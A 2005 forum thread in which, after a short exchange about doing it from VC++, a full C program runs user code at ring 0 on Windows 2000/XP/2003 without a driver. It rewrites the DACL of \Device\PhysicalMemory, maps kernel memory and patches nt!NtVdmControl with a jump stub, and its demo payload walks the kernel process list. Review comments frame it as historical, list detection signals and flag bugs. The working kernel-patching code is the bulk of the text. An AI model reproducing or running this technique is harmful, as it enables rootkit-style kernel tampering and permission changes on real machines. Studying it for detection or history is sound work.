发布于:2005-01-05 17:44
If the software is built with VC++ and runs under Windows, how do I use your code? Can you give an example of implementing it with VC++? Thanks!
发布于:2005-01-05 20:07
I already posted the method for switching from ring 3 to ring 0 years ago; you can search for it on the net.
发布于:2005-01-06 08:54
;;; ring3 --> ring0 switch C code
;;; From zzzEVAzzz idea
/*
 * Historical (2005) demonstration: a 32-bit user-mode process on Windows
 * 2000/XP/2003 runs one of its own functions at ring 0 without loading a
 * driver. Flow as implemented below: locate ntoskrnl.exe in memory
 * (GetModuleBase); obtain a read/write handle to \Device\PhysicalMemory,
 * rewriting the object's DACL if the first open is denied (OpenPhysicalMemory);
 * map the physical page holding nt!NtVdmControl (MapPhysicalMemory); overwrite
 * the first 24 bytes of that routine with a stub that jumps to Ring0Code only
 * when the caller's PID matches this process; call NtVdmControl; restore the
 * original bytes (main).
 *
 * NOTE(review): everything here assumes 32-bit pointers (the ULONG casts), the
 * kernel image living in the 0x80000000-0x9FFFFFFF direct-mapped range, and
 * the three build numbers hard-coded in Ring0Code. Later Windows releases
 * (Server 2003 SP1 and newer, per Microsoft's documentation for the object)
 * refuse user-mode opens of \Device\PhysicalMemory, so the code does not apply
 * there. From a detection standpoint the observable events are: a user process
 * opening \Device\PhysicalMemory (in particular with WRITE_DAC) and changing
 * its DACL, a user process calling LoadLibrary on ntoskrnl.exe, and a
 * transient code modification of nt!NtVdmControl.
 *
 * NOTE(review): printf is used throughout but <stdio.h> is never included.
 * Several original comments were GBK text mis-decoded on the page; they are
 * rendered in English here.
 */
#include <Windows.h>
#include <Ntsecapi.h>
#include <Aclapi.h>
#pragma comment (lib,"ntdll.lib") // Copy From DDK
#pragma comment (lib,"Kernel32.lib")
#pragma comment (lib,"Advapi32.lib")

//------------------ Data struct define --------------------//
// Entry layout returned by ZwQuerySystemInformation(SystemModuleInformation);
// only Base, ModuleNameOffset and ImageName are read below.
typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Reserved[2];
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT Unknown;
    USHORT LoadCount;
    USHORT ModuleNameOffset;
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

typedef enum _SECTION_INHERIT {
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT;

// One record per process, written by Ring0Code and printed by ListProcessInfo.
// Name is copied as 16 raw bytes and is not NUL-terminated by Ring0Code.
typedef struct _MY_PROCESS_INFO {
    ULONG PID;
    ULONG KPEB;
    ULONG CR3;
    CHAR Name[16];
    ULONG Reserved;
} MY_PROCESS_INFO, *PMY_PROCESS_INFO;

typedef long NTSTATUS;
//------------------ data struct end --------------------//

//--------------------- Predefine -----------------------//
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_SUCCESS 0x00000000
#define STATUS_UNSUCCESSFUL 0xC0000001
#define STATUS_NOT_IMPLEMENTED 0xC0000002
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define STATUS_INVALID_PARAMETER 0xC000000D
#define STATUS_ACCESS_DENIED 0xC0000022
#define STATUS_BUFFER_TOO_SMALL 0xC0000023
#define OBJ_KERNEL_HANDLE 0x00000200
#define SystemModuleInformation 11
#define InitializeObjectAttributes( p, n, a, r, s ) { \
    (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
    (p)->RootDirectory = r; \
    (p)->Attributes = a; \
    (p)->ObjectName = n; \
    (p)->SecurityDescriptor = s; \
    (p)->SecurityQualityOfService = NULL; \
}
//--------------------- -----------------------//

//------------------ Native API declare ------------------//
// Prototypes for the ntdll exports this program links against directly.
NTSYSAPI VOID NTAPI RtlInitUnicodeString(
    PUNICODE_STRING DestinationString,
    PCWSTR SourceString
);
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);
NTSYSAPI NTSTATUS NTAPI ZwOpenSection(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
);
NTSYSAPI NTSTATUS NTAPI ZwMapViewOfSection(
    IN HANDLE SectionHandle,
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN ULONG CommitSize,
    IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
    IN OUT PULONG ViewSize,
    IN SECTION_INHERIT InheritDisposition,
    IN ULONG AllocationType,
    IN ULONG Protect
);
NTSYSAPI NTSTATUS NTAPI ZwUnmapViewOfSection(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress
);
NTSYSAPI NTSTATUS NTAPI ZwClose(
    IN HANDLE Handle
);
NTSYSAPI NTSTATUS NTAPI NtVdmControl(
    IN ULONG ControlCode,
    IN PVOID ControlData
);
//------------------ ------ ------------------//

//------------------ Global variable --------------------//
// Kernel-side addresses of ntoskrnl exports. main() resolves each one via
// GetProcAddress on a user-mode LoadLibrary of ntoskrnl.exe and then adds
// (kernel base - user-mode base), so these are only meaningful when called
// from Ring0Code, never from ordinary user-mode code.
NTSTATUS (NTAPI *pfnNtVdmControl)(
    IN ULONG ControlCode,
    IN PVOID ControlData
);
BOOLEAN (NTAPI *pfnPsGetVersion)(
    PULONG MajorVersion OPTIONAL,
    PULONG MinorVersion OPTIONAL,
    PULONG BuildNumber OPTIONAL,
    PUNICODE_STRING CSDVersion OPTIONAL
);
HANDLE (NTAPI *pfnPsGetCurrentProcessId)( );
PVOID (NTAPI *pfnMemcpy)(
    IN VOID UNALIGNED *Destination,
    IN CONST VOID UNALIGNED *Source,
    IN SIZE_T Length
);
ULONG (_cdecl *pfnDbgPrint)(
    IN PCHAR Format,
    ...
);
// Address of the kernel's PsInitialSystemProcess variable (pointer to the
// System process EPROCESS), adjusted the same way as the routines above.
ULONG *pPsInitialSystemProcess;
//------------------------------------------------//

// Get the base of the named kernel module.
// name: module image name (case-insensitive, e.g. "ntoskrnl.exe").
// Returns the module's kernel-mode load address, or NULL on failure (a
// diagnostic is printed). The buffer is grown once when the first query
// reports STATUS_INFO_LENGTH_MISMATCH.
PVOID GetModuleBase(PCSTR name)
{
    NTSTATUS status;
    PVOID pBuffer, pModule;
    ULONG nRetSize, i, n;
    PSYSTEM_MODULE_INFORMATION pmi;

    pBuffer = LocalAlloc(LPTR, 0x1000);
    if (NULL == pBuffer)
    {
        printf("LocalAlloc[0] Failed: %d\n", GetLastError());
        return NULL;
    }
    status = ZwQuerySystemInformation(SystemModuleInformation, pBuffer, 0x1000, &nRetSize);
    if (STATUS_INFO_LENGTH_MISMATCH == status)
    {
        // buffer too small: reallocate with the size the kernel reported
        LocalFree(pBuffer);
        pBuffer = LocalAlloc(LPTR, nRetSize);
        if (NULL == pBuffer)
        {
            printf("LocalAlloc[1] Failed: %d\n", GetLastError());
            return NULL;
        }
        status = ZwQuerySystemInformation(SystemModuleInformation, pBuffer, nRetSize, &nRetSize);
    }
    if (!NT_SUCCESS(status))
    {
        printf("ZwQuerySystemInformation Failed: %d\n", LsaNtStatusToWinError(status));
        LocalFree(pBuffer);
        return NULL;
    }
    // The buffer starts with a ULONG module count followed by the entries;
    // the (ULONG) pointer arithmetic is 32-bit only.
    pmi = (PSYSTEM_MODULE_INFORMATION)((ULONG)pBuffer + 4);
    n = *(ULONG*)pBuffer;
    pModule = NULL;
    // search for the requested module and take its base address
    for (i=0; i<n; i++)
    {
        // ImageName holds the full path; ModuleNameOffset points at the file name part
        if (!_stricmp(pmi->ImageName+pmi->ModuleNameOffset, name))
        {
            pModule = pmi->Base;
            break;
        }
        pmi++;
    }
    LocalFree(pBuffer);
    return pModule;
}

// Get a read/write section handle for \Device\PhysicalMemory.
// Returns the handle, or NULL on failure (a diagnostic is printed).
// If the direct open is refused with STATUS_ACCESS_DENIED, the object is
// reopened with READ_CONTROL | WRITE_DAC, an ACE granting the calling user
// SECTION_MAP_READ | SECTION_MAP_WRITE is appended to its DACL, and the open
// is retried. Note that the DACL change is never reverted by this program.
// NOTE(review): the WRITE_DAC open presumably only succeeds for an account
// that already holds that right on the object (an administrator on the OS
// versions targeted) - confirm against the default DACL of the build in use.
// NOTE(review): pSD is not initialised before the early "goto FreeAndExit"
// paths, yet "if (pSD) LocalFree(pSD)" reads it there; that read is undefined
// behaviour when the first ZwOpenSection succeeds or fails outright.
HANDLE OpenPhysicalMemory()
{
    DWORD dwRet;
    NTSTATUS status;
    UNICODE_STRING name;
    OBJECT_ATTRIBUTES oa;
    EXPLICIT_ACCESS ea;
    PSECURITY_DESCRIPTOR pSD;
    PACL pDacl = NULL;
    PACL pNewDacl = NULL;
    HANDLE hSection = NULL;
    HANDLE hSectionRet = NULL;

    RtlInitUnicodeString(&name, L"\\Device\\PhysicalMemory");
    InitializeObjectAttributes(&oa, &name, OBJ_KERNEL_HANDLE, NULL, NULL);
    // open PhysicalMemory with read/write section access (recovered from mis-encoded comment)
    status = ZwOpenSection(&hSectionRet, SECTION_MAP_READ | SECTION_MAP_WRITE, &oa);
    if (NT_SUCCESS(status)) goto FreeAndExit; // success, return directly
    if (status != STATUS_ACCESS_DENIED)
    { // any error other than access denied is fatal
        printf("ZwOpenSection[0] Failed: %d\n", LsaNtStatusToWinError(status));
        hSectionRet = NULL;
        goto FreeAndExit;
    }
    // access denied: reopen with just enough rights to rewrite the DACL
    status = ZwOpenSection(&hSection, READ_CONTROL | WRITE_DAC, &oa);
    if (!NT_SUCCESS(status))
    {
        printf("ZwOpenSection[1] Failed: %d\n", LsaNtStatusToWinError(status));
        goto FreeAndExit;
    }
    // get the current DACL of PhysicalMemory (pSD owns the returned descriptor)
    dwRet = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pDacl, NULL, &pSD);
    if (dwRet != ERROR_SUCCESS)
    {
        printf("GetSecurityInfo Failed: %d\n", dwRet);
        goto FreeAndExit;
    }
    // build an ACE that grants the calling user read/write mapping of PhysicalMemory;
    // "CURRENT_USER" is the special trustee name resolved to the caller by advapi32
    ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_READ | SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance = NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = "CURRENT_USER";
    // merge the new ACE into a copy of the existing DACL
    dwRet = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
    if (dwRet != ERROR_SUCCESS)
    {
        printf("SetEntriesInAcl Failed: %d\n", dwRet);
        goto FreeAndExit;
    }
    // write the new DACL back to the PhysicalMemory object (persistent for the object's lifetime)
    dwRet = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL);
    if (dwRet != ERROR_SUCCESS)
    {
        printf("SetSecurityInfo Failed: %d\n", dwRet);
        goto FreeAndExit;
    }
    // retry the read/write open now that the DACL allows it
    status = ZwOpenSection(&hSectionRet, SECTION_MAP_READ | SECTION_MAP_WRITE, &oa);
    if (!NT_SUCCESS(status))
    {
        printf("ZwOpenSection[2] Failed: %d\n", LsaNtStatusToWinError(status));
        goto FreeAndExit;
    }
FreeAndExit:
    if (pSD) LocalFree(pSD);
    if (pNewDacl) LocalFree(pNewDacl);
    if (hSection) ZwClose(hSection);
    return hSectionRet;
}

// Map a range of physical memory into the current process's address space.
// hSection:   section handle for \Device\PhysicalMemory (from OpenPhysicalMemory)
// Offset:     start of the mapping, relative to physical address 0
// CommitSize: number of bytes to map
// Returns the user-mode base of the read/write view, or NULL on failure.
// (HANDLE)-1 is the current-process pseudo handle. Note that ViewSize is a
// SIZE_T while the local prototype declares PULONG; the two coincide only on
// 32-bit builds.
PVOID MapPhysicalMemory(HANDLE hSection, // section handle of physical memory
                        ULONG Offset,    // mapping start offset, relative to physical address 0
                        ULONG CommitSize // size of the range to map
                        )
{
    NTSTATUS status;
    PVOID BaseAddress = NULL;
    LARGE_INTEGER PhysicalAddress = {Offset, 0};
    SIZE_T ViewSize = CommitSize;

    status = ZwMapViewOfSection(hSection, (HANDLE)-1, &BaseAddress, 0, CommitSize, &PhysicalAddress, &ViewSize, ViewShare, 0, PAGE_READWRITE);
    if (!NT_SUCCESS(status))
    {
        printf("ZwMapViewOfSection Failed: %d\n", LsaNtStatusToWinError(status));
        return NULL;
    }
    return BaseAddress;
}

// Ring0 code: demo that records every process's PID, EPROCESS ("KPEB"), CR3
// and image name. It executes in kernel mode when the patched NtVdmControl
// jumps here, so it must only touch the pfn* kernel pointers above and the
// caller-supplied buffer - no user-mode API is called.
// size:   size of buffer in bytes
// buffer: output; buffer[0] receives the record count, followed by
//         MY_PROCESS_INFO records
// Returns STATUS_NOT_IMPLEMENTED for an unknown build, STATUS_BUFFER_TOO_SMALL
// or STATUS_INVALID_PARAMETER for a bad buffer, else STATUS_SUCCESS.
// NOTE(review): the list is walked without any visible locking, and the loop
// stops at the entry whose Flink is ListHead, so that last process is omitted.
NTSTATUS Ring0Code(ULONG size, PULONG buffer)
{
    ULONG BuildNumber;
    ULONG ListOffset;
    ULONG PIDOffset;
    ULONG NameOffset;
    PLIST_ENTRY ListHead, ListPtr;
    PMY_PROCESS_INFO mypi;

    pfnDbgPrint("Run in Ring0!\n"); // kernel-side debug output (DbgPrint), not the console
    pfnPsGetVersion(NULL, NULL, &BuildNumber, NULL);
    pfnDbgPrint("BuildNumber = %d\n", BuildNumber);
    switch (BuildNumber) // EPROCESS field offsets differ per build; only these three are known here
    {
    case 2195: // Win2000
        ListOffset = 0xa0;
        PIDOffset = 0x9c;
        NameOffset = 0x1fc;
        break;
    case 2600: // WinXP
        ListOffset = 0x88;
        PIDOffset = 0x84;
        NameOffset = 0x174;
        break;
    case 3790: // Win2003
        ListOffset = 0x88;
        PIDOffset = 0x84;
        NameOffset = 0x154;
        break;
    default:
        return STATUS_NOT_IMPLEMENTED;
    }
    if (size<4) return STATUS_BUFFER_TOO_SMALL;
    size -= 4;
    if (NULL == buffer) return STATUS_INVALID_PARAMETER;
    *buffer = 0L; // record count, incremented per process below
    mypi = (PMY_PROCESS_INFO)(buffer + 1);
    // walk ActiveProcessLinks starting from the System process
    ListHead = ListPtr = (PLIST_ENTRY)(*pPsInitialSystemProcess + ListOffset);
    while (ListPtr->Flink != ListHead)
    {
        if (size < sizeof(MY_PROCESS_INFO)) return STATUS_BUFFER_TOO_SMALL;
        mypi->KPEB = (ULONG)ListPtr - ListOffset;
        mypi->PID = *(ULONG*)(mypi->KPEB + PIDOffset);
        mypi->CR3 = *(ULONG*)(mypi->KPEB + 0x18); // 0x18: hard-coded page-directory base offset, same for all three builds
        pfnMemcpy(mypi->Name, (PVOID)(mypi->KPEB + NameOffset), 16);
        (*buffer)++;
        mypi++;
        size -= sizeof(MY_PROCESS_INFO);
        ListPtr = ListPtr->Flink;
    }
    return STATUS_SUCCESS;
}

// Display the process records produced by Ring0Code.
// buffer: buffer[0] is the record count, followed by MY_PROCESS_INFO records.
// Name is not NUL-terminated by Ring0Code; "%s" stops at the Reserved field,
// which is zero because main() allocates the buffer with LocalAlloc(LPTR).
void ListProcessInfo(PULONG buffer)
{
    ULONG i, n = *buffer;
    PMY_PROCESS_INFO mypi = (PMY_PROCESS_INFO)(buffer + 1);

    printf(" PID KPEB CR3 Name\n" " ---- -------- -------- ----\n");
    for (i=0; i<n; i++)
    {
        printf(" %-4d %08x %08x %s\n", mypi->PID, mypi->KPEB, mypi->CR3, mypi->Name);
        mypi++;
    }
}

// Entry point: resolves kernel addresses, patches nt!NtVdmControl through the
// physical-memory view, calls it once, restores the original bytes, and prints
// the collected process list. Every failure path falls through to FreeAndExit.
void main()
{
    char *Kernel = "ntoskrnl.exe";
    PVOID pKernel = NULL;
    HMODULE hKernel = NULL;
    HANDLE hSection = NULL;
    char *mapping = NULL;
    PVOID buffer = NULL;
    ULONG offset;
    NTSTATUS status;
    // 23-byte stub written over the start of NtVdmControl; the FF/EE/DD
    // placeholders are patched at offsets 1, 6 and 13 below. memcpy moves 24
    // bytes (including the literal's terminating NUL), and the same 24 are
    // saved in OrigCode and restored afterwards.
    char OrigCode[24], HookCode[24] =
        "\xE8\xFF\xFF\xFF\xFF" // call 0xffffffff ;nt!PsGetCurrentProcessId
        "\x3D\xEE\xEE\xEE\xEE" // cmp eax, 0xeeeeeeee ;own PID
        "\x75\x05"             // jne $+5
        "\xE9\xDD\xDD\xDD\xDD" // jmp 0xdddddddd ;Ring0Code
        "\xB8\x01\x00\x00\xC0" // mov eax, 0xc0000001 ;STATUS_UNSUCCESSFUL
        "\xC3";                // ret

    printf("\n -=< Run Ring0 Code Without Driver Demo >=-\n\n");
    // get the load address of the system kernel ntoskrnl.exe
    pKernel = GetModuleBase(Kernel);
    if (NULL == pKernel) return;
    if ((ULONG)pKernel < 0x80000000 || (ULONG)pKernel > 0x9FFFFFFF)
    { // the physical-address arithmetic below assumes the kernel sits in the direct-mapped range
        printf("Error: Kernel module base (%08x) is out of range.\n", pKernel);
        return;
    }
    // load a user-mode copy of the kernel image so its exports can be resolved with GetProcAddress
    hKernel = LoadLibrary(Kernel);
    if (NULL == hKernel)
    {
        printf("LoadLibrary Failed: %d\n", GetLastError());
        return;
    }
    // resolve the user-mode addresses of the kernel routines/variables
    // (recovered from mis-encoded comment). The empty statement after the
    // condition is intentional: only the else branch does anything.
    if ((pfnMemcpy = (PVOID)GetProcAddress(hKernel, "memcpy")) &&
        (pfnDbgPrint = (PVOID)GetProcAddress(hKernel, "DbgPrint")) &&
        (pfnNtVdmControl = (PVOID)GetProcAddress(hKernel, "NtVdmControl")) &&
        (pfnPsGetVersion = (PVOID)GetProcAddress(hKernel, "PsGetVersion")) &&
        (pfnPsGetCurrentProcessId = (PVOID)GetProcAddress(hKernel, "PsGetCurrentProcessId")) &&
        (pPsInitialSystemProcess = (PVOID)GetProcAddress(hKernel, "PsInitialSystemProcess")));
    else
    {
        printf("GetProcAddress Failed: %d\n", GetLastError());
        goto FreeAndExit;
    }
    // rebase to the real kernel addresses: kernel base minus user-mode base.
    // Casting an lvalue like "(ULONG)p += x" is a compiler extension, not standard C.
    offset = (ULONG)pKernel - (ULONG)hKernel;
    (ULONG)pfnMemcpy += offset;
    (ULONG)pfnDbgPrint += offset;
    (ULONG)pfnNtVdmControl += offset;
    (ULONG)pfnPsGetVersion += offset;
    (ULONG)pfnPsGetCurrentProcessId += offset;
    (ULONG)pPsInitialSystemProcess += offset;
    // fill in the stub: call rel32 (offset 1), this process's PID (offset 6), jmp rel32 (offset 13);
    // rel32 values are relative to the end of each instruction, hence the -5 and -17
    *(ULONG*)(HookCode+1) = (ULONG)pfnPsGetCurrentProcessId - (ULONG)pfnNtVdmControl - 5;
    *(ULONG*)(HookCode+6) = GetCurrentProcessId();
    *(ULONG*)(HookCode+13) = (ULONG)Ring0Code - (ULONG)pfnNtVdmControl - 17;
    // open the physical memory section
    hSection = OpenPhysicalMemory();
    if (NULL == hSection) goto FreeAndExit;
    // map the page that holds NtVdmControl
    offset = (ULONG)pfnNtVdmControl & 0x1FFFF000; // page-aligned physical address: drops the top 3 bits, i.e. assumes a direct map from 0x80000000
    mapping = MapPhysicalMemory(hSection, offset, 0x2000); // two pages, presumably so the 24-byte patch cannot run past the view
    if (NULL == mapping) goto FreeAndExit;
    // save the original NtVdmControl entry bytes (recovered from mis-encoded comment)
    offset = (ULONG)pfnNtVdmControl & 0x00000FFF; // offset in page
    memcpy(OrigCode, mapping+offset, 24);
    buffer = LocalAlloc(LPTR, 0x1000); // zeroed; ListProcessInfo relies on that for Name termination
    if (NULL == buffer)
    {
        printf("LocalAlloc Failed: %d\n", GetLastError());
        goto FreeAndExit;
    }
    // Between these two memcpy calls every caller of NtVdmControl system-wide
    // hits the stub; other processes get STATUS_UNSUCCESSFUL from it. The
    // restore runs regardless of the call's result.
    memcpy(mapping+offset, HookCode, 24); // hook NtVdmControl
    status = NtVdmControl(0x1000, buffer); // invoke NtVdmControl, enter Ring0
    memcpy(mapping+offset, OrigCode, 24); // restore NtVdmControl entry
    if (!NT_SUCCESS(status))
    {
        printf("NtVdmControl Failed: %d\n", LsaNtStatusToWinError(status));
        goto FreeAndExit;
    }
    ListProcessInfo(buffer);
FreeAndExit:
    if (buffer != NULL) LocalFree(buffer);
    if (mapping != NULL) ZwUnmapViewOfSection(hSection, mapping);
    if (hSection != NULL) ZwClose(hSection);
    if (hKernel != NULL) FreeLibrary(hKernel);
}